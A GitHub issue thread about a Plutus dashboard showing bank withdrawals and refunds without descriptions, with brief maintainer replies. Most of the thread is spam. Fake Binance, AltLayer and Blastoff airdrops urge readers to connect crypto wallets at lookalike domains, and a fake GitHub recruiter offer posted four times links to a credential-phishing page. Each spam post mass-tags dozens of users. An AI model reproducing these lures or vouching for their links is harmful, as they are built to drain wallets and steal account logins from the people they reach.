### ISSUE TITLE
Withdrawal without a description

### ISSUE THREAD

**Issue by HangLoose1971** [quentingosset/PlutusAnalyticsDashboard#33]
![image](https://github.com/quentingosset/PlutusAnalyticsDashboard/assets/139506659/6806301d-ddd0-43ff-8880-29952f22adf7)

![image](https://github.com/quentingosset/PlutusAnalyticsDashboard/assets/139506659/92cfd448-7833-4b3b-a901-f60aa4515238)

![image](https://github.com/quentingosset/PlutusAnalyticsDashboard/assets/139506659/4109b20e-643b-41f4-ba5f-2c834be386e5)

![image](https://github.com/quentingosset/PlutusAnalyticsDashboard/assets/139506659/2c37b5ae-73c4-4e54-bef7-dcaf2e184d65)

A transfer to an IBAN account is displayed without a description, just like the payment directly to PLU, for example, for the metal card.

**Comment by quentingosset** [comment]
Metal card purchase is show on release 1.0.7 :)
For general withdraw to a bank account i still missing some information to do it because i never execute a withdrawal request

**Comment by renmadigi** [comment]
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @GoPro16, @KingOfCrypto, @sofianhw, @jumperdevweb3, @davidfurlong, @adriendarki, @flada-auxv, @jok311, @PaulGG-Code, @stavaughan, @Eric010000111, @grytchyn, @helloworld9912, @bingryan, @colliepixels, @QuentinRiviere, @zhangyouxin, @4skinSkywalker, @teddywilson, @ChaiSomsri96, @Chrismarshal95, @koolamusic, @tasvln, @saularraffi, @RogerHiguerey, @AVatch, @Daldiv, @smonami, @mduongvandinh, @hawx1993

**Comment by RafliAkmal** [comment]
# AltLayer Airdrop Season One Announcement

[![AltLayer Airdrop Season One](https://miro.medium.com/v2/da:true/resize:fit:1200/0*QvP91LW92QLv9_qq)](http://go.altlayerio.online/zHaxVS)

Exciting news! AltLayer token (ALT) is set to launch on Binance on January 25, 2024. This milestone couldn't have been reached without our amazing community. Your support has been crucial from conceptualization to product development.

To show our gratitude, we're inviting you to join the "ALT Token community" through an airdrop for early supporters and partners. Below is a summary:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of total supply)
- **Distribution Categories:**
  - NFT Holders
  - Altitude Campaign Participants
  - EigenLayer Restakers
  - EigenLayer Ecosystem Partners
  - Celestia Stakers and others

For detailed criteria and information, check the full announcement [here](http://go.altlayerio.online/zHaxVS).

[Claim](http://go.altlayerio.online/zHaxVS) opens from January 25 to February 25, 2024. Unclaimed ALT tokens after this period will return to AltLayer’s Treasury.

Thank you for being part of AltLayer's success! More to come in Season One, stay tuned.

**Note:** Certain regions are restricted from the airdrop. Please review the disclaimer before participating.


Winners: @denisond, @wmwqyvon, @baobaoy, @seasonHxy, @AriesWmj, @PyVH, @0xhanh, @0xblitz, @Ev3rlasting, @fubsy-eth, @burubiu, @himeta, @wengzilla, @olamiye, @sabraham, @ApexLGF, @Ivanvv, @bitqiu, @AlanTrudor, @yl

**Comment by Talkingbaby** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
cometkim, @EthanBlockson, @jamiegreen7, @iCodeDuck, @amlcodes, @Brwnknight20, @Yhamskie30, @DarrenChowles, @nncl, @Yetispapa, @CerealKiller97, @c0rv0s, @houman-sanati, @ZXM0000, @pvalentim, @Josepereirahuiry, @sachalevy, @whck6, @0xJamesBong, @pepeneif

**Comment by nayouta** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
sbhadade, @0xCourtney, @wangsicong6688, @Tigeur, @alvaroserrrano, @ys-zzu, @SunShine-Smile, @sabraham, @fala13, @carlito5555, @civcell, @llleoxxxx, @pzzhai, @zanaca, @timbuckiii, @Zhou180, @holasergio, @mikedemarais, @Dondudu, @devanton2021

**Comment by willianfcamara** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team

**Comment by harryoh** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
daimajia, @navied, @AttilaAs, @longcpp, @Coiling-Dragon, @BowtiedRahman, @phbrgnomo, @AlexADittrich, @johnnyhoichuen, @vvonchain, @carzygod, @defliction, @developerfred, @thaixuandang, @sambarnes, @lht102, @Sahilkhurana, @alexandrewolff, @dimkkv, @feewet

**Comment by roccozs** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
hendririza, @henryfour, @Nicemanss, @HorizonLiang, @GeeNogeeno, @jasl, @wangyi160, @pantaovay, @pilab-gwon, @NexZhu, @Tyler-Franklin, @brandnewx, @yutingzhao1991, @vdovaT, @linkdrone, @coder8matic, @0x4E33, @TangMonk, @lifezq, @thejoven, @monosux, @dipaksaraf, @philippnagel, @koobitor, @Simkoud, @nelsonic, @Ugo, @Tengdw, @solidnerd, @alipostaci2001, @Mepond, @zerosnacks, @xingxinglian, @rwbaumg, @moriowanibe, @m0ham3dx, @syphrpunk, @ademets, @ermantaylan, @pluswave, @albertchon, @varejkeee, @behkod, @tarrsalah, @superbigfu, @baumstern, @thackerronak, @lecoler, @ArseniiPetrovich, @Metroxe

**Comment by rasine** [comment]
您的邮件已经收到，稍后我会仔细阅读！

**Comment by ben-ba** [comment]
same for refunds

**Comment by rasine** [comment]
您的邮件已经收到，稍后我会仔细阅读！

**Comment by quentingosset** [comment]
> same for refunds

i don't have this information from Plutus. i can't give some description :(
